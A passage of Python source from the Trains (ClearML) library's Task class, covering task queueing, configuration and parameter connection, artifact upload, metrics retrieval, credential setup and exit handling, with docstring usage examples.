Enqueue (send) a task for execution, by adding it to an execution queue
:param task: Task object (or Task ID) to be enqueued
:type task: Task / str
:param str queue_name: Name of the queue in which to enqueue the task.
:param str queue_id: ID of the queue in which to enqueue the task. If not provided use queue_name.
:return: enqueue response
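Usage sketch (illustrative; assumes a queue named 'default' exists on the server):
cloned = Task.clone(source_task=task)
Task.enqueue(cloned, queue_name='default')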
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
if not queue_id:
req = queues.GetAllRequest(name=queue_name, only_fields=["id"])
res = cls._send(session=session, req=req)
if not res.response.queues:
raise ValueError('Could not find queue named "{}"'.format(queue_name))
queue_id = res.response.queues[0].id
if len(res.response.queues) > 1:
LoggerRoot.get_base_logger().info("Multiple queues with name={}, selecting queue id={}".format(
queue_name, queue_id))
req = tasks.EnqueueRequest(task=task_id, queue=queue_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
@classmethod
def dequeue(cls, task):
# type: (Union[Task, str]) -> Any
"""
Dequeue (remove) task from execution queue.
:param task: Task object (or Task ID) to be dequeued
:type task: Task / str
:return: Dequeue response
"""
assert isinstance(task, (six.string_types, Task))
if not Session.check_min_api_version('2.4'):
raise ValueError("Trains-server does not support DevOps features, upgrade trains-server to 0.12.0 or above")
task_id = task if isinstance(task, six.string_types) else task.id
session = cls._get_default_session()
req = tasks.DequeueRequest(task=task_id)
res = cls._send(session=session, req=req)
resp = res.response
return resp
def add_tags(self, tags):
# type: (Union[Sequence[str], str]) -> None
"""
Add tags to this task. Old tags are not deleted
When running remotely, this method has no effect.
:param tags: An iterable or space separated string of new tags (string) to add.
:type tags: str or iterable of str
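Usage sketch (illustrative tags):
task.add_tags(['baseline', 'resnet50'])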
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
# type: (Any) -> Any
"""
Connect an object to a task (see introduction to Task connect design)
:param mutable: can be any object Task supports integrating with:
- argparse : for argument passing
- dict : for argument passing
- TaskParameters : for argument passing
- model : for initial model warmup or model update/snapshot uploads
:return: connect_task() return value if supported
:raise: raise exception on unsupported objects
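Usage sketch (illustrative; parameter names and values are placeholders):
params = {'learning_rate': 0.001, 'batch_size': 32}
params = task.connect(params)  # when executed remotely, values may be overridden from the backend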
"""
dispatch = (
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
)
for mutable_type, method in dispatch:
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def connect_configuration(self, configuration):
# type: (Union[Mapping, Path, str]) -> Union[Mapping, Path, str]
"""
Connect a configuration dict / file (pathlib.Path / str) with the Task
Connecting configuration file should be called before reading the configuration file.
When an output model will be created it will include the content of the configuration dict/file
Example local file:
config_file = task.connect_configuration(config_file)
my_params = json.load(open(config_file,'rt'))
Example parameter dictionary:
my_params = task.connect_configuration(my_params)
:param (dict, pathlib.Path/str) configuration: usually configuration file used in the model training process
configuration can be either dict or path to local file.
If dict is provided, it will be stored in json alike format (hocon) editable in the UI
If pathlib2.Path / string is provided the content of the file will be stored
Notice: local path must be relative path
(and in remote execution, the content of the file will be overwritten with the content brought from the UI)
:return: configuration object
If dict was provided, a dictionary will be returned
If pathlib2.Path / string was provided, a path to a local configuration file is returned
"""
if not isinstance(configuration, (dict, Path, six.string_types)):
raise ValueError("connect_configuration supports `dict`, `str` and 'Path' types, "
"{} is not supported".format(type(configuration)))
# parameter dictionary
if isinstance(configuration, dict):
def _update_config_dict(task, config_dict):
task._set_model_config(config_dict=config_dict)
if not running_remotely() or not self.is_main_task():
self._set_model_config(config_dict=configuration)
configuration = ProxyDictPostWrite(self, _update_config_dict, **configuration)
else:
configuration.clear()
configuration.update(self._get_model_config_dict())
configuration = ProxyDictPreWrite(False, False, **configuration)
return configuration
# it is a path to a local file
if not running_remotely() or not self.is_main_task():
# check if not absolute path
configuration_path = Path(configuration)
if not configuration_path.is_file():
ValueError("Configuration file does not exist")
try:
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
except Exception:
raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_model_config_text()
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='trains_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary with the Task
When an output model is created it will store the model label enumeration dictionary
:param dict enumeration: dictionary of string to integer, enumerating the model output integer to labels
example: {'background': 0 , 'person': 1}
:return: enumeration dict
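Usage sketch (illustrative labels):
labels = task.connect_label_enumeration({'background': 0, 'person': 1})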
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not self.is_main_task():
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a logger object for reporting, for this task context.
All reports (metrics, text etc.) related to this task are accessible in the web UI
:return: Logger object
"""
return self._get_logger()
def mark_started(self):
"""
Manually Mark the task as started (happens automatically)
"""
# UI won't let us see metrics if we're not started
self.started()
self.reload()
def mark_stopped(self):
"""
Manually Mark the task as stopped (also used in :func:`_at_exit`)
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped()
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs
:param wait_for_uploads: if True the flush will exit only after all outstanding uploads are completed
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
if wait_for_uploads:
# noinspection PyProtectedMember
self._logger._flush_wait_stdout_handler()
else:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self._reporter:
self.reporter.flush()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset the task. Task will be reloaded following a successful reset.
Notice: when running remotely the task will not be reset (as it will clear all logs and metrics)
:param set_started_on_success: automatically set started if reset was successful
:param force: force task reset even if running remotely
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
def close(self):
"""
Close the current Task. Enables manually shutting down the task.
Should only be called if you are absolutely sure there is no need for the Task.
"""
self._at_exit()
self._at_exit_called = False
# unregister atexit callbacks and signal hooks, if we are the main task
if self.is_main_task():
self.__register_at_exit(None)
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, "pandas.DataFrame", Dict, Union[bool, Sequence[str]]) -> None
"""
Add artifact for the current Task, used mostly for Data Auditing.
Currently supported artifacts object types: pandas.DataFrame
:param str name: name of the artifact. Notice: it will override a previous artifact if the name already exists.
:param pandas.DataFrame artifact: artifact object, supported artifacts object types: pandas.DataFrame
:param dict metadata: dictionary of key value to store with the artifact (visible in the UI)
:param Sequence uniqueness_columns: Sequence of columns for artifact uniqueness comparison criteria.
The default value is True, which means all the columns (same as artifact.columns).
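Usage sketch (illustrative; assumes a pandas DataFrame named df with an 'id' column):
task.register_artifact('training samples', df, metadata={'source': 'train.csv'}, uniqueness_columns=['id'])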
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Remove artifact from the watch list. Notice this will not remove the artifacts from the Task.
It will only stop monitoring the artifact,
the last snapshot of the artifact will be taken immediately in the background.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
dictionary of Task registered artifacts (name, artifact object)
Notice these objects can be modified, changes will be uploaded automatically
:return: dict
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(self, name, artifact_object, metadata=None, delete_after_upload=False):
# type: (str, Union[str, Mapping, "pandas.DataFrame", "numpy.ndarray", "PIL.Image.Image"], Optional[Mapping], bool) -> bool
"""
Add static artifact to Task. Artifact file/object will be uploaded in the background
:raises ValueError: if artifact_object is not supported
:param str name: Artifact name. Notice: it will override a previous artifact if the name already exists
:param object artifact_object: Artifact object to upload. Currently supports:
- string / pathlib2.Path are treated as path to artifact file to upload
If wildcard or a folder is passed, zip file containing the local files will be created and uploaded
- dict will be stored as .json file and uploaded
- pandas.DataFrame will be stored as .csv.gz (compressed CSV file) and uploaded
- numpy.ndarray will be stored as .npz and uploaded
- PIL.Image will be stored to .png file and uploaded
:param dict metadata: Simple key/value dictionary to store on the artifact
:param bool delete_after_upload: If True local artifact will be deleted
(only applies if artifact_object is a local file)
:return: True if artifact will be uploaded
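Usage sketch (illustrative file path and metadata):
task.upload_artifact('predictions', artifact_object='/tmp/predictions.csv', metadata={'epoch': 3})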
"""
return self._artifacts_manager.upload_artifact(name=name, artifact_object=artifact_object,
metadata=metadata, delete_after_upload=delete_after_upload)
def get_models(self):
# type: () -> Dict[str, List[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task
Input models are files loaded in the task, either manually or automatically logged
Output models are files stored in the task, either manually or automatically logged
Automatically logged frameworks are for example: TensorFlow, Keras, PyTorch, ScikitLearn(joblib) etc.
:return dict: dict with keys input/output, each is list of Model objects.
Example: {'input': [trains.Model()], 'output': [trains.Model()]}
"""
task_models = {'input': self._get_models(model_type='input'),
'output': self._get_models(model_type='output')}
return task_models
def is_current_task(self):
# type: () -> bool
"""
Check if this task is the main task (returned by Task.init())
.. deprecated:: 0.1.0
Use :func:`is_main_task()` instead
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the main task
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Check if this task is the main task (created/returned by Task.init())
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the main task
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :func:`connect_configuration` instead
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :func:`connect_configuration` instead
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :func:`connect_configuration` instead
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set Task output label enumeration (before creating an output model)
When an output model is created it will inherit these properties
:param enumeration: dictionary of string to integer, enumerating the model output to labels
example: {'background': 0, 'person': 1}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Return the maximum reported iteration (i.e. the maximum iteration the task reported a metric for)
Notice, this is not a cached call, it will ask the backend for the answer (no local caching)
:return: last reported iteration number (integer)
"""
self._reload_last_iteration()
return max(self.data.last_iteration, self._reporter.max_iteration if self._reporter else 0)
def set_last_iteration(self, last_iteration):
# type: (int) -> None
"""
Forcefully set the last reported iteration
(i.e. the maximum iteration the task reported a metric for)
:param last_iteration: last reported iteration number
:type last_iteration: integer
"""
self.data.last_iteration = int(last_iteration)
self._edit(last_iteration=self.data.last_iteration)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: newly set initial offset
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset, default is 0
Useful when continuing training from previous checkpoints
:return int: initial iteration offset
"""
return super(Task, self).get_initial_iteration()
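# Illustrative usage sketch (caller-side, not part of the library source): when resuming
# training from a checkpoint, offset reported iterations so plots continue from the
# checkpoint; `start_iteration` is an assumed value loaded by the caller.
#
#     start_iteration = 5000
#     task.set_initial_iteration(start_iteration)
#     assert task.get_initial_iteration() == start_iteration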
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Extract the last scalar metrics, ordered by title and series in a nested dictionary
:return: dict. Example: {'title': {'series': {'last': 0.5, 'min': 0.1, 'max': 0.9}}}
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
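# Illustrative usage sketch (caller-side, not part of the library source): the nested dict
# returned above is keyed title -> series -> {'last', 'min', 'max'}; the 'loss'/'train'
# names are assumed example titles.
#
#     metrics = task.get_last_scalar_metrics()
#     last_train_loss = metrics.get('loss', {}).get('train', {}).get('last')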
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get task parameters as a raw nested dict
.. note::
values are not parsed and are returned as-is (i.e. as strings)
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set task parameters from a (possibly nested) dict
While parameters are set just as they would be in connect(dict), this does not link the dict to the task,
but rather performs a one-time update.
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
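# Illustrative usage sketch (caller-side, not part of the library source): round-trip task
# parameters as a nested dict; note values come back unparsed, i.e. as strings (see
# get_parameters_as_dict above). The parameter names and returned shape are assumptions.
#
#     task.set_parameters_as_dict({'lr': 0.01, 'batch_size': 32})
#     params = task.get_parameters_as_dict()   # e.g. {'lr': '0.01', 'batch_size': '32'}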
@classmethod
def set_credentials(cls, api_host=None, web_host=None, files_host=None, key=None, secret=None, host=None):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], Optional[str]) -> ()
"""
Set new default trains-server host values and credentials
These configurations will be overridden by either OS environment variables or the trains.conf configuration file
.. note::
credentials need to be set *prior* to Task initialization
:param str api_host: Trains API server url, example: api_host='http://localhost:8008'
:param str web_host: Trains WEB server url, example: web_host='http://localhost:8080'
:param str files_host: Trains Files server url, example: files_host='http://localhost:8081'
:param str key: user key/secret pair, example: key='thisisakey123'
:param str secret: user key/secret pair, example: secret='thisisseceret123'
:param str host: host url (overrides api_host), example: host='http://localhost:8008'
"""
if api_host:
Session.default_host = api_host
if web_host:
Session.default_web = web_host
if files_host:
Session.default_files = files_host
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if host:
Session.default_host = host
Session.default_web = web_host or ''
Session.default_files = files_host or ''
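# Illustrative usage sketch (caller-side, not part of the library source): credentials must be
# set before Task.init(); the host values and key/secret below are placeholders.
#
#     Task.set_credentials(
#         api_host='http://localhost:8008',
#         web_host='http://localhost:8080',
#         files_host='http://localhost:8081',
#         key='<access_key>',
#         secret='<secret_key>',
#     )
#     task = Task.init(project_name='examples', task_name='credentials demo')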
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: model configuration (unconstrained text string), usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: model config_text (unconstrained text string)
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary
"""
config_text = self._get_model_config_text()
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _create_dev_task(cls, default_project_name, default_task_name, default_task_type, reuse_last_task_id,
detect_repo=True):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id:
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task.status) in (str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_model_id or (ARCHIVED_TAG in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# set development tags
task.set_system_tags([cls._development_tag])
# clear task parameters, they are not cleared by the Task reset
task.set_parameters({}, __update=False)
# clear the comment, it is not cleared on reset
task.set_comment(make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
# clear the input model (and task model design/labels)
task.set_input_model(model_id='', update_task_design=False, update_task_labels=False)
task._set_model_config(config_text='')
task.set_model_label_enumeration({})
task.set_artifacts([])
task._set_storage_uri(None)
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark the task as started
task.started()
# force update of base logger to this current task (this is the main logger task)
task._setup_log(replace_existing=True)
logger = task.get_logger()
if closed_old_task:
logger.report_text('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id:
logger.report_text('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
else:
logger.report_text('TRAINS Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure everything is in sync
task.reload()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet):
# type: (Optional[float]) -> Logger
"""
get a logger object for reporting based on the task
:param flush_period: The period of the logger flush.
If None or any other falsy value, the logger will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
if not self._logger:
# force update of base logger to this current task (this is the main logger task)
self._setup_log(replace_existing=self.is_main_task())
# Get a logger object
self._logger = Logger(private_task=self)
# make sure we set our reporter to async mode
# we make sure we flush it in self._at_exit
self.reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model):
assert isinstance(model, OutputModel)
model.connect(self)
return model
def _save_output_model(self, model):
"""
Save a reference to the connected output model.
:param model: The connected output model
"""
self._connected_output_model = model
def _reconnect_output_model(self):
"""
If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, and then we will have to get the model design from the
input model by reconnecting.
"""
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.info('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
return model
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
_parser, _parsed_args = get_argparser_last_args()
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and self.is_main_task():
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary):
def _update_args_dict(task, config_dict):
task._arguments.copy_from_dict(flatten_dictionary(config_dict))
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict))
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, flat_dict))
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if not running_remotely() or not self.is_main_task():
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
return attr_class
def _validate(self, check_output_dest_credentials=False):
if running_remotely():
super(Task, self)._validate(check_output_dest_credentials=False)
def _output_model_updated(self):
""" Called when a connected output model is updated """
if running_remotely() or not self.is_main_task():
return
# Make sure we know we've started, just in case we didn't so far
self._dev_mode_task_start(model_updated=True)
def _dev_mode_task_start(self, model_updated=False):
""" Called when we suspect the task has started running """
self._dev_mode_setup_worker(model_updated=model_updated)
def _dev_mode_stop_task(self, stop_reason):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped()
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True)
# noinspection PyProtectedMember
os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get current process if pid not provided
include_parent = True
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task():
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for detection repo sync
if self._detect_repo_async_thread:
with self._repo_detect_lock:
if self._detect_repo_async_thread:
try:
if self._detect_repo_async_thread.is_alive():
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
"""
Called automatically once the process exits (registered via atexit)
:return:
"""
# protect sub-process at_exit
if self._at_exit_called:
return
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
# from here do not get into watch dog
self._at_exit_called = True
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
if not running_remotely() and self.is_main_task() and not is_sub_process:
# check if we crashed, or the signal is not interrupt (manual break)
task_status = ('stopped', )
if self.__exit_hook:
if (self.__exit_hook.exception and not isinstance(self.__exit_hook.exception, KeyboardInterrupt)) \
or (not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
task_status = ('failed', 'Exception')
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not self.__exit_hook.exception:
task_status = ('completed', )
else:
task_status = ('stopped', )
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self._reporter and self.reporter.get_num_results() > 0)):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
# wait until the reporter flushes everything
if self._reporter:
self.reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except:
pass
if print_done_waiting:
self.log.info('Finished uploading')
elif self._logger:
self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.completed()
elif task_status[0] == 'stopped':
self.stopped()
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
if self._logger:
self._logger.set_flush_period(None)
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
except Exception:
# make sure we do not interrupt the exit process
pass
# delete locking object (lock file)
# noinspection PyBroadException
if self._edit_lock:
try:
del self._edit_lock
except Exception:
pass
self._edit_lock = None
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# unregister the exception and signal hooks
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
self._orig_exc_handler = None
for s in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, self._org_handlers[s])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
